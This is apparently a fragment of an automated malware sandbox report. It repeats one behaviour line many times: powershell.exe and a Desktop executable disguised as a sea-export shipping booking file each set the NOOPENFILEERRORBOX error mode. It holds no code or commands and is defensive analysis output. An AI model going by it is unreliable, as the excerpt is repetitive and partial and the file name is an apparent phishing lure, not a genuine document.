Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
